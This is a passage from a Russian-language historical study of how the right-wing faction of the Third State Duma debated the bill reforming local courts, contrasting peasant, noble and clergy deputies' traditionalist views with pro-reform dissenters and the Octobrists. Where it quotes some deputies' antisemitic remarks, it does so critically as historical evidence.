взглядом на проблемы местной юстиции выступила фракция, занимавшая в Думе крайне правые позиции и закрепившая это вполне определённое место в своем названии – «фракция правых». Анализ обсуждения основных положений законопроекта представителями фракции правых позволяет выявить специфику фракционного правосознания, отношения к власти, обществу и личности, феномену правового государства, дающие в свою очередь представление об общих чертах политического мировоззрения «истинно русских людей» в российском парламенте, а также выявить его особенности внутри фракции.
Прежде всего, необходимо отметить, что основная часть ораторов от фракции решительно выступала против идеи единоличного мирового суда, противопоставляя ей требование либо сохранить (в реформированном виде) волостной суд либо ввести новый коллегиальный суд в составе двух заседателей и судьи, обладающего образовательным цензом по типу «гминных судов», существовавших в тот период в Царстве Польском. Именно аргументация такой позиции представляется чрезвычайно интересной для выявления политического мировоззрения партии и её отдельных группировок.
Почти все правые крестьянские депутаты отстаивали безусловную необходимость крестьянского самоуправления, необходимым элементом которого было наличие выборного суда, настаивая на том, что именно крестьянское сословие в силу обладания уникальными моральными качествами является наиболее способным к нему. Однако отстаивали они право на самоуправление именно как своё узко-сословное право, как возможность закрепить и гарантировать свою сословную обособленность. Право на самоуправление и свой суд крестьянские правые депутаты понимали как свободу, однако свобода в их представлении являлась лишь сословной привилегией. Именно поэтому некоторые крестьянские депутаты, такие как например В.А. Образцов подчеркивали, что, по их мнению, крестьянскому населению нужны не политические права и свободы, предусматривающие их право избирать государственных должностных лиц, а «права, защищающие в обыденной жизни» [2, ст. 1749], т.е. право на корпоративную обособленность и «огражденность» групповых интересов.
В силу такого взгляда становится понятна и особая позиция правых крестьянских депутатов по поводу связанного теснейшим образом с преобразованием местного суда, предполагавшегося учреждения всесословной волости в качестве низшей единицы земского самоуправления которая, окончательно должна была привести к ликвидации сословной обособленности крестьянства и открыть широкую дорогу процессам модернизации в деревне, ликвидации там основ традиционализма. Правые крестьянские депутаты, в принципе, не возражали против всесословного характера волостного самоуправления, однако делали акцент на необходимость «поглощения» крестьянством «модернизационного элемента» в деревне, его ассимиляции крестьянством с его патриархальными, традиционалистскими началами, воспринимавшимися правыми как безусловная ценность.
Не считая необходимым активное участие крестьянства в политической жизни, крестьянские депутаты, придерживавшиеся различных позиций по поводу формы будущего суда (реформированный волостной или суд по типу гминного), одинаково горячо выступали против вмешательства бюрократии в сферу крестьянского самоуправления, подчеркивая бесправие крестьянского населения по отношению к бюрократической машине, открыто выражая ей свое недоверие и мотивируя этим отказ поддержать инициированную ею реформу местного суда. Крестьянин М.С. Андрейчук полагал, что законопроект будет только предлогом (поскольку он предусматривал такую возможность в случае отсутствия желающих или соответствующих цензу местных кадров) назначать на место мировых судей чиновников, «чуждых интересам местного населения», в результате чего, как утверждал другой депутат-крестьянин Ф.Ф. Тимошкин, 5 000 «лиш-них чиновников», «весьма дорогостоящих», будет «посажено на русский народ». Вместе с тем, показательно, что правые крестьянские депутаты не возлагали ответственность за чиновничий произвол, эксплуатацию, грубое вмешательство во внутреннюю жизнь крестьянства на правительство, полагая, по словам В.А. Образцова, что «виновато не правительство, а система». Такой взгляд имел причиной, по-видимому, то, что правительство было назначено императором, который являлся в глазах правых депутатов верховным сувереном и пользовался непререкаемым авторитетом. Таким образом, недоверие к бюрократической машине у правых крестьян вполне сочеталось с безграничным доверием к монарху, который венчал верхушку бюрократической пирамиды.
В силу того же отрицания необходимости политических свобод и недоверия к бюрократии, пытавшейся модернизировать привычный уклад традиционного общества, а также к новым группам населения, вырвавшимся за рамки узаконенной традицией и докапиталистическим укладом патриархальной жизни сословного строя, они считали «меньшим злом» доверить представительство крестьянских интересов сословной группе, за которой исторически, по их мнению, шло крестьянство – дворянству. Поэтому некоторые правые крестьянские депутаты выступали не против земельного ценза, а против его возможной «формальности», которая откроет доступ к посту местного судьи «крапивному семени» чиновников, а не местным дворянам-землевладельцам.
Крестьянские депутаты выступали против законопроекта и по следующему мотиву. Они резко отрицательно относились к такому основополагающему постулату правового государства, как разделение властей и, в частности, к принципу независимости судебной власти от административной – тому принципу, который был поставлен во главу угла при составлении законопроекта о преобразовании местного суда. В устах ораторов – крестьян фракции правых оправданием отвержения такого принципа становилось якобы неизбежное «бессилие» независимой судебной власти. Особенно рьяно негодность принципа разделения властей отстаивали крестьянские депутаты – сторонники сохранения волостного суда, который в принципе совмещал вынесение решения с непосредственным понудительным его исполнением.
Ещё одним аргументом против учреждения мирового суда в устах правых крестьянских депутатов становится якобы априорная непригодность для крестьянства процедурных и организационных форм судебного процесса, применявшихся в системе обычных, несословных судов. Крестьянские избранники неоднократно противопоставляли волостной суд как суд «народный», «народной совести», «праведный», основанный на традиционалистских, почвеннических устоях, суду «неправедному» под которым фактически подразумевался суд (используя терминологию В.О. Ключевского) «цивилизации», суд, основанный на принципах нового времени, суд индустриального общества. В общем, недовольство крестьян в проектируемом новом суде «цивилизации» вызывало как ни парадоксально его чёткое следование писаному законодательству, в котором депутаты видели ни много ни мало посягательство «на исторические устои», на «совесть народную», «уважение к правде» в пользу «лживой формы судопроизводства», которая судит, как выразился депутат от крестьян Екатеринославской губернии В.А. Образцов, «не по совести», не «глядя по делу, глядя по человеку», а на основе закона [2, ст. 1323]. В процедуре неукоснительного следования суда закону депутатами всячески сознательно подчеркивался и выпячивался элемент юридического формализма, якобы препятствовавшего реализации принципа справедливости. Такое неприятие писаного законодательства имело своим источником, по-видимому, предпочтение, отдаваемое выразителями интересов почвеннических элементов российского общества традиции, в частности, традиции правовой, юридической, воплощённой в преклонении перед неписанным обычаем как основным и единственно нравственно оправданным источником права. Однако для нравственных ценностей «цивилизации», индустриального общества, базой которых является безусловное уважение к законности и праву, признание их системного характера и верховенства, подобная позиция воплощала правовой нигилизм и вряд ли могла считаться сколько-нибудь оправданной. В качестве конкретных причин непригодности для крестьянства процесса в мировом суде депутаты-«почвенники» выдвигали вытекающие из следования суда формальному праву дороговизну, волокиту судопроизводства, необходимость пользоваться формализованной документацией, а вследствие этого расходы на адвокатов, которым «правое» крестьянство не доверяло, опять-таки как представителям «цивилизации». В этой связи волостной суд противопоставлялся проектируемому мировому в качестве «простого, близкого, доступного для простолюдина», суда, в котором нет нужды иметь адвоката, писать «формальное прошение», везти свидетелей в суд и т.д. Некоторые крестьянские депутаты – сторонники волостного суда, в частности, волостной старшина из Курской губернии Н.А. Белогуров полагали, что при подавляющем превосходстве мелких исков замена неформального, дешёвого суда формализованным и дорогим приведёт к нежеланию крестьян обращаться в суд и росту самосуда [2, ст. 1744]. Им вторили и сторонники «гминного» суда (Ф.Ф. Тимошкин) также полагая, что суд, требующий дорогостоящего и непонятного для крестьян письменного судопроизводства, услуги, вызывающей активное отторжение фигуры правых крестьян адвоката, суд, в котором, по мнению правых, в силу разъездного характера деятельности неизбежны волокита, непригоден для крестьянства. В целом же можно сделать вывод, что призыв правых крестьянских депутатов считаться с «бытовыми особенностями крестьянства», в составе которых сами же они, как тот же Н.А. Белогуров числили «бедность, робость, безграмотность» [2, ст. 1744–1745], изобличает в качестве истинного намерения не «воспитание» (созданием новых, более прогрессивных правовых учреждений и институтов) крестьянства в духе уважения к праву, преодоления правового нигилизма и волюнтаризма, не приспособление его правосознания к нуждам модернизации, а ведущую в тупик консервацию этих, с их же точки зрения, во многом отрицательных устоев.
В выступлениях правых крестьянских депутатов, особенно отстаивавших необходимость сохранения волостного суда, осуждавших недостатки мирового суда можно уловить и такой мотив, как сословное недоверие к такому страту «цивилизации», индустриального общества, как интеллигенция. С учреждением мирового суда связывался опасность её массового притока в деревню (прежде всего в качестве судей и адвокатов). Это воспринималось правыми как опасность для традиционалистской изоляции сельского населения, интеллигенция трактовалась депутатами как некий «внешний», враждебный по отношению к крестьянству слой населения, который, по мнению того же Н.А. Белогурова, не будет по отношению к крестьянам «терпелив и участлив».
Причём правые крестьянские депутаты воспринимали интеллигенцию и «третий элемент» не только как враждебный им социальный слой, но и как носителя «западнической» идеологии, выражавшейся в стремлении привить России чуждые на взгляд депутатов-почвенников начала правового государства и гражданского общества. Поэтому крестьяне, занимавшие правые думские скамьи, практически в один голос обвиняли инициаторов и сторонников законопроекта в том, что они создают юридическую базу для проникновения в деревню в лице «новых» судей и адвокатов «смутьянов и крамольников» – конституционалистов, которые хотят экономически, морально и политически, через суд, «закабалить крестьянство». Не случайно в этом содействии политическим противникам правых «поработить русскую деревню морально и материально» [2, ст. 1335], они обвиняли как символ абсолютного зла (т.е. начал, подрывавших почвеннические устои, вводившие новые начала индустриального общества и модернизации) «мировую еврейскую закулису», рупором которой считали творца российского конституционализма, фактического автора «Манифеста 17 октября» С.Ю. Витте – первого инициатора принятия нового закона о местном суде. В категорию политических противников – носителей чуждой политической идеологии – правые крестьяне заносили не только по образовательному (интеллигенты), но и по профессиональному (третий элемент), политическому (левые либералы и социалисты) и даже по национальному (поляки, евреи) признакам (жалобы на последних высказывали, в основном, представители крестьянства западных губерний, обвинявших сторонников законопроекта в том, что он, по выражению депутата от Волынской губернии Я.Г. Данилюка, «отдаёт крестьян в польскую и еврейскую адвокатскую кабалу» [2, ст. 1086]. В этих группах населения они не без основания видели, прежде всего, социальную базу чуждых им экономических, социальных и политических начал, своих политических врагов, которые стремятся подорвать устои «почвы». Естественно, с проникновением их в деревню они были намерены бескомпромиссно бороться в стенах Думы.
Такими началами в глазах правых были не только идейные и политические, но и социально-экономические основы модернизированного общества – развитие частной собственности, товарно-денежных отношений, усилении роли предпринимательских элементов в общественной и политической жизни. Поэтому распространению их влияния в деревне, подрывавшего традиционалистский коллективизм и единство крестьянского мира, чему, по их мнению, содействовал законопроект, крестьянские депутаты также старались всемерно противоборствовать. С несословным, некрестьянским судом – судом «цивилизации» – связывалось крестьянскими депутатами катализация социально-экономического размывания крестьянского сословия, поддержка предпринимательских элементов деревни юридическими средствами. По словам крестьянина М.С. Андрейчука, мировой суд будет судом «богатого народа», другой депутат – крестьянин Ф.Ф. Тимошкин, высказал мнение о том, что волостной суд лучше мирового именно тем, что «решает дела не по мироедству и кулачеству, а по справедливости» [2, ст. 1445]. Именно с опасностью усиления в результате столыпинских реформ новых предпринимательских элементов в деревне связано высказываемое некоторыми крестьянскими депутатами предпочтение равенства всех перед судом, предлагаемое реформой сохранение в деревне в качестве меньшего зла привилегированного положения дворян-помещиков как почвеннических элементов, сословные привилегии которого тесно связаны с сословной обособленностью и социально-экономической однородностью, единством крестьянского населения. Так, крестьянин Н.А. Белогуров говорил о «животном инстинкте», присущим крестьянам, который заставляет их опасаться того, что, «потеряв покровительство благородного дворянства, они могут попасть под безжалостный гнёт эксплуатации капитализма», «ненависть к которому они впитали в себя ещё с молоком матери» [2, ст. 1335].
Именно поэтому при рассмотрении конкретных предложений по реформированию органов местной юстиции, выдвигаемых крестьянскими депутатами, обращает на себя внимание то обстоятельство, что противоречия между сторонниками сохранения реформированного волостного суда и «суда по типу гминного» были малозначимы. По мнению сторонников сохранения волостного суда, для его улучшения необходимо была лишь материальная поддержка суда, в первую очередь, в форме увеличения жалования судьям и заседателям волостных судов в пять раз (что, по словам крестьянских депутатов, вполне способно гарантировать «их правдивость, честность и добросовестность»), а также создание для него специальных кодексов. Главным для них было именно сохранение сословности суда. Сторонники суда, по типу гминного, в принципе допускали включение в состав суда представителей иных социальных групп (в лице председателя), однако при сохранении численного преобладания в составе суда представителей именно крестьянского сословия. Показательно, что никаких споров, какой-либо полемики между правыми крестьянами по этому поводу не возникало. Фактически речь шла о том, что крестьянство останется или единственным сословием, которое будет судиться и судить в местном суде, или же безусловно преобладающим сословием. Главным смыслом такой структуры местной юстиции было «подчинить» «почвенническим» взглядам крестьянства все иные социальные группы волости, а фактически, сельской местности вообще.
Показательно, что главным аргументом всех крестьянских депутатов о необходимости недопущения в деревню (как в местное самоуправление, так и в суд) «чуждых», социальных элементов, сформированных «культурой урбанизма», являлась их якобы моральная и политическая враждебность крестьянству, несовместимость систем ценностей. Крестьянские депутаты говорили об опасности «развращения», проникающего «из культурных городов в деревню», о росте уголовной преступности, причину которой они видели именно в порождённой европейской цивилизацией «культуре урбанизма», в том числе, о росте преступности политической, то есть, прежде всего, революционной пропаганды, от которой малограмотный крестьянский писарь, по мнению правых крестьянских депутатов, будет местное население ограждать гораздо лучше, чем представители интеллигенции и третьего элемента, заинтересованные в ней уже в силу своей социальной принадлежности.
Наконец, заслуживает внимания и методика политической борьбы за отмену законопроекта, провозглашавшаяся правыми крестьянскими депутатами. Отрицая такие политические устои «цивилизации», как конституционализм и парламентаризм, предполагавшие как минимум уважение мнения большинства и наличие в политической культуре стремления к достижению политического согласия и компромисса, воспринимая как единственного суверена и легитимный центр власти монарха, правые крестьянские депутаты предпочли убеждению угрозы Думе и правительству обратиться к царю с требованием содействовать отмене законопроекта. Это лишний раз доказывает полное неприятие этой группой депутатов ценностей парламентаризма и их ориентацию на традиционалистские, почвеннические устои политической жизни.
Таким образом, исходя из вышеизложенного можно сделать вывод о том, что правые крестьянские депутаты при обсуждении законопроекта о преобразовании местного суда выражали не только социально-экономические, классовые интересы части крестьянства, но и ценностные, цивилизационные. Отталкиваясь от них, они выступали за сословную обособленность крестьянства, воспринимая свободу как сословную привилегию, что характерно именно для традиционалистского, «почвеннического» (по определению В.О. Ключевского) менталитета. Они последовательно отстаивали необходимость изоляции крестьянства как социальной базы «почвы» с её своеобразным менталитетом, ценностями, интересами, правосознанием, правовой культурой от «цивилизации» и в связи с этим пытались всеми силами сохранить сословный крестьянский суд. Защищая свою позицию, они фактически боролись против политических устоев модернизации и индустриального общества, выражая активное недоверие к чиновничеству и выступая в то же время сторонниками абсолютизма, будучи последовательными противниками принципов парламентской демократии и разделения властей.
Защищали правые крестьянские депутаты российскую деревню от проникновения в неё не только политических, но и социальных (усиления влияния интеллигенции, буржуазии), экономических (торжества частной собственности, рыночного хозяйства, капиталистических отношений, вызывавших экономическое расслоение крестьянства), правовых (утверждения принципов верховенства закона, появления профессионального суда, адвокатуры) начал модернизации, угрожавших сословно-корпоративной и «цивилизационной» обособленности крестьянства.
В силу этого понятно, что политические взгляды и требования крестьянских депутатов первых российских парламентов были обусловлены не только их классовой и партийной принадлежностью, но и следованием определённым цивилизационным, социокультурным принципам, разделявшимся частью российского крестьянства, далеко не всегда носившими прогрессивный и демократический характер.
Обращает на себя внимание то обстоятельство, что дворянские депутаты фракции придерживались, в целом, практически тех же позиций по поводу законопроекта, что и депутаты-крестьяне. Однако большинство из них выступали с более консервативных позиций, с точки зрения необходимости сохранения волостного суда, причём некоторые из них (В.М. Пуришкевич) даже с сохранением административно-судебной власти земского участкового начальника.
Так же как и крестьянские депутаты, депутаты «помещичьи» отстаивали необходимость сохранения сословной обособленности крестьянства, выступали за изоляцию «почвы» с её своеобразным менталитетом, ценностями, интересами, правосознанием, правовой культурой от цивилизации.
Однако здесь акцент, в большей степени, делался на идеологическую мотивацию. Народ отождествлялся ими с крестьянством, а оно признавалось априори носителями идеологических догматов правых: неограниченности самодержавия, всемерного насаждения православия в роли официальной идеологии, шовинизма, национализма, и т.д., поэтому поддержка институтов, обеспечивающих изоляцию крестьянства от заражённой «революционным духом» интеллигенции, безусловно, импонировала правым. Аргументировалось это тем, что сохранение сословного строя и привилегий дворянства разрушает «историческое деление народа» [2, ст. 1152], противно историческим традициям, которые подрываются «революционными принципами». Видимо поэтому большинство дворянских депутатов отстаивало необходимость сохранения волостного суда, причём практически в неизменном виде (полагая даже, в отличие от депутатов-крестьян, что низкое материальное обеспечение судей не являлось причиной какой-либо слабости волостных судов).
Стремясь сохранить почвенническую, а значит, и идеологическую обособленность крестьянства, правые дворянские депутаты, как и крестьяне-парламентарии также высказывали аргументы о якобы недоступности будущих судов для крестьянства, их дороговизне и, самое главное, несоответствии «народному духу», выраженному в приверженности своим узкокорпоративным обычаям и традициям, из-за которых они якобы никогда не приживутся «на наших чернозёмных полях» и породят лишь ненависть и презрение к себе [2, ст. 1735].
Кроме того, упор ими делался на необходимости укрепления сословного строя вообще и сохранения в связи с этим сословных привилегий дворянства как господствующего в деревне слоя землевладельцев. Особенно этим отличались два правых «зубра» – Н.А. Марков и В.М. Пуришкевич. Николай Александрович, например, открыто защищал сословные привилегии дворянства, говоря, что ему «свойственна дворянская точка зрения» и что «только тот член своего сословия, кто защищает его законные интересы» [2, ст. 1716]. Дворянство, по их мнению, являлось сословием наиболее преданным идее российского государства и наиболее последовательным носителем его традиционалистских, почвеннических устоев, напрямую соотносившихся с идеологическими догматами правых.
На этом основании «первейшее государственное сословие» было, на их взгляд, вправе и обязано контролировать бюрократию (которой именно по идеологическим мотивам правое дворянство не доверяло) и осуществлять экономическую, политическую и правовую опеку над крестьянством. Здесь видно характерное для «почвы» отстаивание необходимости патриархального надзора за крестьянством со стороны феодального служилого сословия. На этом основании Пуришкевич, например, требовал сохранения института уездного земского начальника, преобразованного в видах: ужесточения начала земельного ценза, невмешательства Минюста в его деятельность и повышения уровня его материального обеспечения – т.е. укрепления сословности и ликвидации любого контроля над ним со стороны «бюрократического» судебного ведомства.
Г.А. Шечков выступал против желания правительства создать «единый» суд и ликвидировать сословный строй именно потому, что опасался «установления единого бюрократизма», по его мнению, оторвавшегося от «почвы», которой он приписывал безусловное следование их идеологическим догматам, в связи с этим, против появления «присланных» судей, не знакомых с местными условиями.
В.А. Марков также был сторонником сохранения этого института, считая, что сам по себе волостной суд не годен, поскольку «крестьяне, оставленные одни в своей среде не в состоянии справиться даже с низшей формой суда» [2, ст. 1713]. Марков настаивал на том, что для успешной деятельности им нужен «цемент» в виде «культурных государственных элементов», роль которых в центральной России, по его мнению, играло поместное дворянство. Полагая, что разложившаяся в идейном плане под влиянием «мировой закулисы» «общественность» не поймёт этого решения, Марков 2-й в принципе не возражал (однако лишь на словах, на деле, предлагая передать законопроект в ещё одну комиссию и надеясь постоянными затяжками способствовать его провалу), в крайнем случае, против судов по образцу гминных, настаивая, однако, на их не всесословном, а «двусословном» характере, при ведущей роли дворянства и сохранении за крестьянством права участвовать в суде, но именно как права узко-сословного, при исключении третьего элемента и интеллигенции. Интересно, что достоинство гминных судов он видел именно в том, что суд «не посягает на дворянство», (хотя, конечно же, понимая, что в Польше, где подобные суды были распространены, дворянство вовсе не располагало теми сословными привилегиями, о сохранении которых ратовал Марков).
Ту же позицию отстаивал и депутат П.В. Новицкий, видевший причину плачевного состояния пореформенных мировых судов в том, что в них проникли «лица с искусственным цензом», не принадлежавшие к кругу местных дворян-землевладельцев [2, ст. 1622], и утверждавший, что реформа 1889 г., похоронившая мировые суды, была абсолютна правильна и именно благодаря ей удалось подавить революцию, усилив в деревне «служилое сословие». Таким образом, дворянские депутаты, несмотря на некоторую разницу во взглядах на форму местного суда, были солидарны в необходимости сохранить свои сословные привилегии, что является несомненным признаком традиционалистских, почвеннических взглядов, и выступали как сторонники неразрывной связи интересов крестьян и дворян, считая их своего рода «сиамскими близнецами», двумя столпами, на которых держались почвеннические устои России.
Так же, как крайне правые крестьяне, крайне правые дворяне выступали против принципа разделения властей, положенного в основу законопроекта. Депутаты от дворянства считали, что подобный принцип создаёт ситуацию «бессилия» суда, который не в состоянии административной властью прямо устранить нарушение закона, что, в свою очередь, породит неизбежную волокиту. Однако и здесь сословный и идеологический акцент выражен в гораздо большей степени, чем у крестьянских депутатов. Так, этот аргумент становится в их устах ещё одним оправданием необходимости сохранения судебной власти земских участковых начальников, олицетворявших «попечительскую» по отношению к крестьянству и «контролирующую» по отношению к чиновничеству политическую роль поместного дворянства. Кроме того, дворянские депутаты полагали, что такой принцип полностью противоречит их идеологическим догматам, главнейшим из которых был властный суверенитет монарха, и исходя из которого, по словам Г.А. Шечкова, нельзя было «создавать какую-то власть и хлопотать об усилении какой-то власти параллельно власти царской» [2, ст. 1158]. Самостоятельность суда понималась ими как неукоснительное следование воле суверена, его независимость фактически трактовалась как автономия от общества. Поэтому особенную озабоченность у правых дворянских депутатов вызывала предполагавшаяся законопроектом зависимость судей от выбирающих их земских и городских органов самоуправления, которым они не доверяли, поскольку считали ненадёжными именно с идеологической точки зрения. Зависимость мировых судей от избирателей трактовалась, в первую очередь, как зависимость от оппозиционных политических партий, от «политиканов», которые «заражены революционным духом», могут, «распропагандируя» народ (в первую очередь, крестьянство), привести страну к революции. В связи с этим, как и крестьянские депутаты, дворяне-парламентарии были категорически против проникновения в деревню и торжества в городе социальных, политических, этнических, экономических элементов модернизации в лице интеллигенции, третьего элемента, кадетов, сельской буржуазии (Марков, например, уверял депутатов, что в мировом суде будет непременно присутствовать «бессудие для крестьянской бедноты и засилье богатых»), евреев, тесно увязывая возможность такого проникновения с избранием судей, а не назначением «сверху» волей суверена и делая особый акцент на политической и идейной неблагонадёжности представителей леволиберальных партий – «рабов, пристрастных партийных директив», репрессии которых против противников режима будут «слишком слабыми», а также на опасности проникновения в деревню при их непосредственном содействии еврейства, «принявшего христианство для вида» [2, ст. 1719].
Таким образом, очевидно, что правые дворянские депутаты, так же как и крестьянские, не признавали политико-правовых ценностей «цивилизации»: парламентаризма, разделения властей, независимости суда от административной власти, идеологии и сословных интересов, национального и сословного равенства и даже прогресса как такового (по мнению Маркова, «прогресс без иудейства немыслим» [2, ст. 1717]). Однако, вместе с тем, правые дворянские депутаты делали акцент на отстаивании своих сословных привилегий, сохранении и упрочении монопольного влияния на политическую жизнь страны, утверждении покровительственной позиции по отношению к крестьянству и необходимости идеологизации государственного механизма и политической жизни страны. В целом, такая позиция свидетельствовала, с одной стороны, о сохранении в среде определённых кругов российского поместного дворянства традиционалистских ценностей, солидаризировавших их с определёнными кругами «классово-чуждого» им крестьянства, а с другой – о стремлении их представителей не воспитывать народ в духе уважения к ценностям правового государства, а использовать его отсталость в своих узкосословных и узкоидеологических интересах.
Схожую позицию занял и правый представитель русской православной церкви Еп. Митрофан. Так же как и другие правые ораторы, он отстаивал близость сословного волостного суда крестьянству, которая понималась им, прежде всего, как близость духовная, как соответствие такого суда «духу» народа, особенностям его правосознания («почвенническому менталитету», с современной точки зрения). На его взгляд, такой суд воплощал в себе «здоровое народное начало», «порождение великого русского духа», что осознавалось крестьянством, в первую очередь, не разумом, а «чутьём» как «что-то близкое, родное, дорогое» ему [2, ст. 1588–1589]. Точно так же как крестьянские и дворянские крайне-правые, Митрофан сваливал недостатки волостного суда на то, что он попал под влияние сельской буржуазии, «кулаков и мироедов» [2, ст. 1587], т.е. социальных кругов, чуждых традиционалистским устоям «почвы», за изоляцию которых от деревни он выступал. Так же, как и основная масса его коллег по фракции, он критиковал принцип выборности мировых судей из опасения зависимости их от партийной конъюнктуры и отсутствия «авторитета царского слуги» (т.е. ему было присуще отрицание необходимости демократических свобод и сугубо авторитаристское понимание сущности государственной власти, характерное для «почвы»).
Однако этот тезис дополнялся аргументом о необходимости избежать «национальных противоречий», особенно характерных для западных регионов империи, в которых и протекала профессиональная деятельность епископа. Фактически речь шла о необходимости не допустить, используя законодательство, религиозную конкуренцию в районах проживания не православного «цензового» населения. Стремление сохранить и упрочить позицию господствующей конфессии средствами и методами государственного вмешательства нельзя не признать одной из существенных черт традиционалистского правосознания. Такую направленность его речей наиболее ярко подтверждает высказанный им тезис о недопустимости допуска в число судей нехристиан, особенно евреев, даже юридически подготовленных. Аргументировалось это отсутствием у них «христианской совести» [2, ст. 1592]. Взгляд на правосудие как на следование, в первую очередь, религиозным канонам, а не светскому законодательству, необходимость религиозного обоснования права, пренебрежительное отношение к принципу верховенства закона также изобличало в нём сторонника традиционалистских устоев.
Вместе с тем, необходимо отметить, что его позиция носила более взвешенный, компромиссный характер, чем позиция его коллег по фракции. Он не возражал, в принципе, против реформы местного судопроизводства. Епископ видел, что она органически связана со столыпинской аграрной реформой, направленной на разрешение аграрного вопроса в России мирными методами, и полагал, что в конечном итоге она приведёт крестьянство «к довольству». Однако, по его мнению, темпы и методы преобразований местного самоуправления и суда должны быть существенно скорректированы. Реформа суда, на его взгляд, не должна быть столь поспешна и насильственна, как предполагаемая. Поэтому он не возражал даже против введения института мировых судей, но только в городах, а не в сельской местности, в которой, по мнению Митрофана, надо было изменять почвеннические устои крайне постепенно и осторожно. В связи с этим он был сторонником введения в деревне суда, сочетающего суд мировой и волостной. Согласно его проекту в каждой волости должно было выбираться двое судей, а мировой судья, назначаемый императором, как и предполагал проект на три волости, периодически объезжал бы их и вместе с местными судьями осуществлял бы правосудие. Причём он тесно связывал появление такого реформированного суда с введением всесословной волости и даже не возражал против проникновения в местный сельский суд интеллигенции, но исключительно «сельской», не оторвавшейся от почвеннических устоев, способной трансформировать достижения индустриального общества в приемлемые для ценностей почвеннического уклада формы.
Таким образом, можно сделать вывод о том, что его позиция в целом, так же как и позиция его коллег по фракции, отражала стремление сохранить обособленность крестьянства как основной социальной базы «почвы», т.е. традиционалистского уклада в российском обществе. Однако его взгляды носили более компромиссный характер. Кроме того, обращает на себя внимание то, что он делал акцент на духовный и национально-религиозный аспект сохранения почвеннических, традиционалистских начал.
В целом, солидарная позиция фракции по поводу необходимости сохранения почвеннических устоев всё же не была монолитной. Два крестьянских депутата – Е.Ф. Герасименко от Витебской губернии и Д.П. Гулькин от Бессарабской губернии – высказали прямо противоположную точкой зрения. Она заключалась в полном одобрении законопроекта, по мотивам резко отличающимся от аргументации коллег по фракции. Депутаты-раскольники категорически возражали против необходимости сословного обособления крестьянства, против понимания свободы как сословной привилегии. «Не будем поддерживать искусственно созданных перегородок между сословиями, постараемся скорее приобщиться к общей культуре и стать едиными и полноправными гражданами...», – была их точка зрения [2, ст. 1478]. В связи с этим они были и против правового противопоставления крестьянства другим группам населения, полностью отрицая существование правомерных в глазах крестьянства и объективно существующих правовых обычаев, трактуя таковые лишь как узаконенный произвол. Эти депутаты отстаивали необходимость специальной подготовки судебных кадров, определённой юридической квалификации. По их мнению, образовательный ценз для местного судьи был гораздо важнее следования велениям обычая и «народной совести», а «знания и опыт» ему нужны не менее, чем для всякой другой специальности. Поэтому они категорически возражали против необходимости участия в суде заседателей как инструмента сословного контроля, утверждая, что именно образовательный ценз будет стимулом для повышения образовательного уровня крестьянства и постепенного стирания сословных перегородок, к чему они и стремились. Вместе с тем, выступая с демократических позиций, они предлагали внести поправку, уменьшающую для судьи имущественный ценз, способствуя этим ликвидации сословной обособленности основного сельского населения. Причины отстаивания принципов равенства всех перед законом, верховенства закона, понимания свободы как надёжной правовой защиты своих личных интересов, характерных для индустриального общества, правового государства, по-видимому, коренились в социально-экономических особенностях развития тех регионов, представителями которых являлись эти крестьянские депутаты. Северо-зпадные и юго-западные районы империи развивались относительно своеобразно. Отсутствие общинного землевладения и землепользования, преимущественно хуторской тип ведения крестьянского хозяйства, постепенная минимизация роли сословных привилегий дворянства, более заметное влияние европейских правовых институтов – всё это обусловило отказ части крестьянства этих регионов от традиционалистских ценностей и восприятие ценностей модернизации.
Из всего вышеизложенного можно сделать следующий вывод. Во-первых, позиция фракции правых, в целом, отражала не классовые интересы, а цивилизационные, «почвеннические», что предопределяло сходство взглядов представителей правого крестьянства, дворянства и духовенства. Все они в процессе обсуждения законопроекта отстаивали необходимость сохранения таких традиционалистских устоев, как: сословный строй, сословная и национально-религиозная обособленность крестьянства, его изоляция от проникновения политических, социальных, экономических, правовых элементов модернизации, угрожавших сословно-корпоративной и «цивилизационной» изоляции сельских жителей, привилегированное положение дворянского сословия, сохранение патриархального и религиозного характера судопроизводства, неприятие принципов либерализма и демократии, и в целом – идеи правового государства. В связи с чем все они в равной мере были категорическими противниками законопроекта. Во-вторых, такая солидарность не исключала существования определённых различий во взглядах, обусловленных классовой и сословной принадлежностью, с одной стороны, депутатов – дворян-помещиков, с другой – крестьянства и духовенства. Крестьянские депутаты обращали большее внимание на отстаивание сословно-корпоративной и «цивилизационной» обособленности крестьянства. Депутаты-дворяне в своих выступлениях акцентировали внимание: на отстаивании своих сословных привилегий; необходимости сохранения и упрочения монопольного влияния своего сословия на политическую жизнь страны; утверждении тезиса о его «покровительственной» роли по отношению к крестьянству и необходимости идеологизации государственного механизма и политической жизни страны в целом. Представитель духовенства, в свою очередь, обращал особенное внимание на необходимость сохранения духовных, национально-религиозных традиционалистских устоев. В-третьих, обращает на себя внимание то, что незначительная часть фракции всё же поддержала законопроект целиком и полностью, отстаивая совершенно противоположные взгляды, выражавшие позицию «цивилизации», направленные на решительную модернизацию правового уклада деревни, утверждение принципов законности, верховенства права, равенства всех перед законом, независимости судебной власти. Такая позиция исходила от представителей крестьянства западных регионов империи, что позволяет увязать их своеобразную точку зрения с особенностями социально-экономического, культурного, юридического, политического развития района, а, в конечном счёте, с определённой системой ценностей, сформировавшихся в этих условиях, с особенностями их мировоззрения, менталитета, правосознания, ориентированных на ценности индустриального, а не традиционалистского общества.
Фракция «Союза 17 октября» по вопросу о необходимости принятия законопроекта выступала в качестве безусловного оппонента правых. Хотя октябристы (как и министр юстиции, представлявший законопроект в Думе) выступали против выдвигавшихся леволиберальными и социалистическими фракциями предложений отменить для мировых судей имущественный ценз, избирать судей не земствами, а непосредственно населением и т.д., всё же основной пафос их речей был направлен против противников законопроекта «справа», стремившихся к консервации традиционалистских устоев российской деревни: сословной и национально-религиозной обособленности крестьянства; привилегированного положения дворянского сословия; сохранения патриархального и религиозного характера судопроизводства; неприятия идеи правового государства. И представитель правительства, и октябристское большинство думской комиссии при обсуждении законопроекта равным образом признавали невозможность в видах реализации принципов независимости суда от администрации, равенства всех перед судом, верховенства закона и т.д., дальнейшего сохранения волостного суда, суда земского начальника и прочих, подобных им судов.
В один голос участвуя в полемике против реакционно настроенных депутатов фракций правых и националистов, они признавали их устаревшими, подлежащими замене единоличным судьёй мирового участкового суда вследствие, прежде всего: сословного характера этих судов, низкого нравственного, умственного и образовательного уровня их членов, а также зависимости волостного суда от администрации и смешения судебных и исполнительных полномочий в лице земского участкового начальника.
